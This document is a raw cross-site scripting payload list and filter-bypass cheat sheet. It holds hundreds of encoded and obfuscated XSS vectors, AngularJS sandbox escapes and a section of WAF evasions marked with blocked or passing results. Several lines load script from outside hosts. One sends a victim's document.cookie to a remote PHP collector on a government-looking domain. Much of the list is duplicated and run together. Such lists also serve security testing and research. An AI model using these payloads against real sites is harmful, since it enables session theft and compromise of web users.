<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:ale&#11
4;t('XSS')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#000
0112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000
039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&
#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert(document&period;location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	
 src="javascript:alert(1)"
	;>
<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[]" onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
</form><input type="date" onfocus="alert(1)">
<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Ta
b;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&New
Line;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&Ne
wLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&
Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xxònerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\
u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<svg/**/; OnlOad=(alert)(1)>---------------------

How To Bypassed

---------------------

/**/
/**
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0A
%0B
%0C
%0D

---------------------

( = %28
) = %29
\ = %5C
/ = %2F
" = %22
= = %3D
: = %3A

---------------------

/**/confirm/**/
/**/(confirm)/**/
/**/%28confirm%29/**/

---------------------

(13337)
%2813337%29
%28%2F13337%2F%29
`13337`
`%2F13337%2F`

---------------------

onmouseover=""
onerror=""
autofocus onfocus=""
onload=""

---------------------'>"></script><svg onload=al\u0065rt(1)/><'"<"'

%26%2339;
>
%26%2334;
>
<
/
script
>
<svg onload
=
"al%26%2392;u0065rt%26%2340;1%26%2341;"
>testtest't"t%5Ct%2Ft<t>t%0At%2522t
testtest'>">/*\
testtest't"t%5Ct%2Ft<t>t%0At%2522t@x.y{{constructor.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString().constructor.prototype.charAt=[].join; [1,2]|
orderBy:toString().constructor.fromCharCode(120,61,9 7,108,101,114,116,40,49,41)}}testtest"><svg
onload=alert(1)>@x.y%3Csvg onload%3Dalert%281%29
<>">"/>/">'>'/>/'>/>> <img/src=aaa.jpg onerror=prompt(document.cookie);> <video src=x
onerror=prompt(document.cookie);> <audio src=x onerror=prompt(document.cookie);>
"><iframe/src="javascript:alert(document.cookie)">
"><iframe/src="data:text/html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button formaction=javascript&colon;alert(document.cookie)>CLICKME</button></form>
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(document.cookie);> "><select autofocus onfocus=alert(document.cookie)>
<textarea autofocus onfocus=alert(document.cookie)> "><keygen autofocus
onfocus=alert(document.cookie)> "><video><source onerror="javascript:alert(document.cookie)"> "><img
src=x onerror="javascript:window.onerror=alert;throw 1"> "><meta http-equiv="refresh"
content="0;url=//goo.gl/nlX0P"> "><math><a xlink:href="//goo.gl/nlX0P">click //
"><svg><script>alert&#40/1/&#41</script>
"><svg><script>varmyvar="text";alert(document.cookie)//";</script></svg> ~~~~~~~~~~~~~~
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg
onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt>
"><scr<script>ipt>alert(document.cookie)</scr<script>ipt> "><a
href=javascript:alert(document.cookie)>Clickme</a> "><body/onhashchange=alert(document.cookie)><a
href=#>clickit</a> "><img src=x onerror=prompt(/xss+found+by+pik4chu/);> "><img src=x
onerror=prompt(document.cookie);> "><script>onmouseover=alert("xss found by pik4chu")</script>
"/></script><svg onload='-/"/-prompt(/baho kag bilat/)//' "><script>alert(String.fromCharCode(120, 115,
115, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104, 117))</script>
"><script>alert("xss")</script> "><A HREF="http://www.google.com"><h1>xss</h1></A>
test'>';))alert('xss');function a () { function b () { var a=' <script>alert(document.coockie);</script>
<script>document.location="http://lgu-virac2010.gov.ph/cok/cok.php?c="+document.cookie</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>=&{} javascript:prompt(0); javascript:alert(document.domain); javascript:alert("x"); '">'"><img
src=x onmouseover=alert(document.domain) ddd=> "onmouseover=alert(document.domain) "
http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html
http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html
http://www.w3schools.com/jsref/dom_obj_document.asp
http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/<>">"/>/">'>'/>/'>/>>
<img/src=aaa.jpg onerror=prompt(document.cookie);> <video src=x onerror=prompt(document.cookie);>
<audio src=x onerror=prompt(document.cookie);> "><iframe/src="javascript:alert(document.cookie)">
"><iframe/src="data:text/html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button formaction=javascript&colon;alert(document.cookie)>CLICKME</button></form>
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(document.cookie);> "><select autofocus onfocus=alert(document.cookie)>
<textarea autofocus onfocus=alert(document.cookie)> "><keygen autofocus
onfocus=alert(document.cookie)> "><video><source onerror="javascript:alert(document.cookie)"> "><img
src=x onerror="javascript:window.onerror=alert;throw 1"> "><meta http-equiv="refresh"
content="0;url=//goo.gl/nlX0P"> "><math><a xlink:href="//goo.gl/nlX0P">click //
"><svg><script>alert&#40/1/&#41</script>
"><svg><script>varmyvar="text";alert(document.cookie)//";</script></svg> ~~~~~~~~~~~~~~
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg
onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt>
"><scr<script>ipt>alert(document.cookie)</scr<script>ipt> "><a
href=javascript:alert(document.cookie)>Clickme</a> "><body/onhashchange=alert(document.cookie)><a
href=#>clickit</a> "><img src=x onerror=prompt(/xss found by pik4chu/);> "><img src=x
onerror=prompt(document.cookie);> "><script>onmouseover=alert("xss found by pik4chu")</script>
"/></script><svg onload='-/"/-prompt(/baho kag bilat/)//' "><script>alert(String.fromCharCode(120, 115,
115, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104, 117))</script>
"><script>alert("xss")</script> "><A HREF="http://www.google.com"><h1>xss</h1></A>
test'>';))alert('xss');function a () { function b () { var a=' <script>alert(document.coockie);</script>
<script>document.location="http://lgu-virac2010.gov.ph/cok/cok.php?c=" document.cookie</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>=&{} javascript:prompt(0); javascript:alert(document.domain); javascript:alert("x"); '">'"><img
src=x onmouseover=alert(document.domain) ddd=> "onmouseover=alert(document.domain) "
http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html
http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html
http://www.w3schools.com/jsref/dom_obj_document.asp
http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/<textarea onblur=alert(1)
id=x>testtest
'
%27
"
%22
\
%5C
/
%2F
<
%3C
>
%3E
<>
%3C%3E
<t>
%3Ct%3E
</script/</K/>
<script>
%2522
%252522
%25252522
%2525252522
alert(1)
javascript:alert(1)
------------------------------------------------------------------------------------------------------------------------
1. (javascript:) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
(200 OK) = <javasc onclick=location=tagName%2BinnerHTML%2Blocation.hash>ript:/*click
me!#*/alert(1)
(Error) = <object data=javascript:alert(1)>
(200 OK) = <object
data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=>
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
2. (on) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = <img src=x onclick=alert(1)>click
(200 OK) = <math><brute href=javascript:alert(1)>click
(Error) = <x onclick=alert(1)>click
(200 OK) = <a href=javascript:alert(1)>click
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
3. (Popup) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = <svg onload=alert(1)>
(200 OK) = <svg onload=%26emsp;pr\u006F\u006Dpt`${1}`>
(Error) = <img src=x onclick=alert(1)>
(200 OK) = <img src=x onclick=a=al\u0065rt,b=1,[b].find(a)>
(Error) = <javascript: onclick=alert(1)>click
(200 OK) = <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click
me!#*/alert(1)
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
4. (Popup Bypassed)
-----------------------------------------------------------------------------------------------------------------------
(Error) = alert(1)
(200 OK) = {alert(1)}
(200 OK) = {/**/alert/**/(1)}
(200 OK) = +{/**/alert/**/(1)}+
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
5. (Popup Pack)
-----------------------------------------------------------------------------------------------------------------------
- alert
- prompt
- confirm
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
6. </script> = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = </script><svg onload=alert(1)>
(200 OK) = </script/*<*/*K*/*>*/**/<svg onload=alert(1)>
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
7. (Space) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = (Space)
(200 OK) = +
(200 OK) = /
(200 OK) = %0A
(200 OK) = %0C
(200 OK) = %0D
(200 OK) = %09
(200 OK) = /**/
(200 OK) = /(space)/
(200 OK) = (space)hello(space)world(space)
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
8. (max="32") ??
-----------------------------------------------------------------------------------------------------------------------
(Error) = <img/src=x+onerror=alert(document.domain)> = 42
(200 OK) = <x/oncut=alert(document.domain)> = 32
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
9. XSS (WAF) Bypassed ??
-----------------------------------------------------------------------------------------------------------------------
- Use </script><svg onload=alert(1)>
- Use HTML Entity (Number) = &#(URL Code)
- Use HTML Entity (Number With ;) = &#(URL Code);
- Use JS Escape (Unicode) = \u00(URL Code)
- Use URL Encode = %(URL Code)
- Use Double URL Encode = %25(URL Code)
- Use Triple URL Encode = %2525(URL Code)
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
10. Bypassed Trick!!!
-----------------------------------------------------------------------------------------------------------------------
- <img src='">hello guyss!!!<'" onclick=alert`1`>
- <svg </onload ="1> (_=prompt,_(1)) "">
- <form><input formaction=javascript:alert(1) type=submit value=click>
- </script>
- <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
- '"</Script><Html /Onmouseover=(alert)(1) //
- <svg><set id=alert onbegin=id1=document.domain,top[id](id1)>
-----------------------------------------------------------------------------------------------------------------------
url=javascript://%250Aalert(document.location="https://google.com",document.location="https://
www.facebook.com")With double encode : con%2566irm%2528document%252Eco%256Fkie%2529
With HTML Code : a%26%2361confirm%26%2344b%26%2361document%26%2346co%26%23111kie
%26%2344%26%2391b%26%2393%26%2346find%26%2340a%26%2341
With JS Escape : set\u0054imeout`con\u0066irm\u0028document\u002eco\u006fkie\u0029`
setTimeout`con\x66irm\x28document\x2eco\x6fkie\x29`

No Bypassed : setTimeout`confirm\x28document\xcookie)`
Filter Firewall Bypassed : s%5Cu0065t%5Cu0054imeo%5Cu0075t%26%2396con%5Cu0066irm
%5Cu0028document%5Cu002eco%5Cu006fkie%5Cu0029%26%2396a = document.createElament("a");
a.href = "javascript:alert()"; a.protocol

javascript://:%0aalert()
javascript:alert(1)

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-
EQUIV="refresh" a="a

<script>a=top[Object.keys(top).filter((v)=>{if(/^do/.test(v))return 1})];for(i in
a)if(/ie$/.test(i))alert(a[i])</script>
<</>script></script></script/<script>alert`1`<</script>/script><script

"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\\";-alert(1);"
\\';-alert(1);'
";-alert(1);"//
';-alert(1);'//
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>

<xmp><p title="</xmp><script>alert(0)</script>">
<iframe %26%2309;%26%2310;%26%2311; src="javascript
%26%2358;alert(1)"%26%2311;%26%2310;%26%2309;;>
\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1

values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20
y=20>XSS</text></a>

<jAvAsC onclick=location=tagName%2BinnerHTML%2Blocation.hash>rIpT:/click me!#/alert(13337)

<jAvAsC onclick=location=tagName%2BinnerHTML%2BURL>rIpT%26colon;#%0Aalert(13337)

<iframe name=windowplz></iframe><script>windowplz.alert(1)</script>
testtest"/accesskey%3D"%26%2388;"/onclick%3D"%26%2391;1%5D.find%26lpar;alert%29
["<s ", " onmouseover='alert(1)'>", "foobar</s>"]
</script><svg><script>alert(1)%0A-->
<style>*{transition:color 1s}*:hover{color:red}</style><brute ontransitionend=confirm(1)>
<svg/on<script><script>load=alert(1)//</script>
<svg><set id=alert onbegin=top[id](1)>
<svg><script>/<@/>alert(1)</script>
<img src onerror=%26emsp;prompt`${document.domain}`>
<svg </onload ="1> (_=prompt,_(1)) "">
{` <body \< onload
=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
<img src=x:alert(alt) onerror=eval(src) alt=document.domain>
<--`<img/src=` onerror=confirm``> --!>
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/
self['doc'%2b'ument']['domain'];">
"><iframe/onload=ajavascript%26colon;alert%26lpar;document%26period;domain%26rpar;>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>t
<a href="j%26Tab;a%26Tab;v%26Tab;asc%26NewLine;ri%26Tab;pt%26colon;%26lpar;a%26Tab;l
%26Tab;e%26Tab;r%26Tab;t%26Tab;(document.domain)%26rpar;">X</a>
<!'/*!"/*\'/*\"/**/-top[`con\x66irm`]`1`//><svg>
">'><details/open/ontoggle=confirm(1)>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
'"</Script><Html /Onmouseover=(alert)(1) //
<svg><animate onend=alert(1) attributeName=x dur=1s>
<script>location='javascript:alert\x281\x29'</script>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'>

<form action="javascript%26%2358;alert%26%2340;1%26%2341;><input type=submit>

<form action=javascript:alert(1)><input type=submit value=XSS>

<math><brute href=javascript:alert(1)>click
<math><brute xlink:href=javascript:alert(1)>click
<svg><script xlink:href=data:,alert(1) />
<form><input formaction=javascript:alert(1) type=submit value=click>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

">'><details/open/ontoggle=confirm(1)>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
-->"'/></sCript><deTailS open x%3D">" ontoggle%3Da%3Dco\u006efirm,b%3D1,[1].find(a)>
<svg </onload ="1> (_=prompt,_(1)) "">
<img src='"><'" onclick=alert`1`>
<img/src='>'<**/onclick=alert`1`//*>*/>
<script>x = '<!--<script>'</script>/-alert(1)</script>

<x contenteditable onblur=alert(1)>lose focus!

<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!

<</div>script</div>>alert()<</div>/script</div>>
<</img>script</img>>alert()<</img>/script</img>>

<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>

<a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert%26lpar;1%26%2341;">

'><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
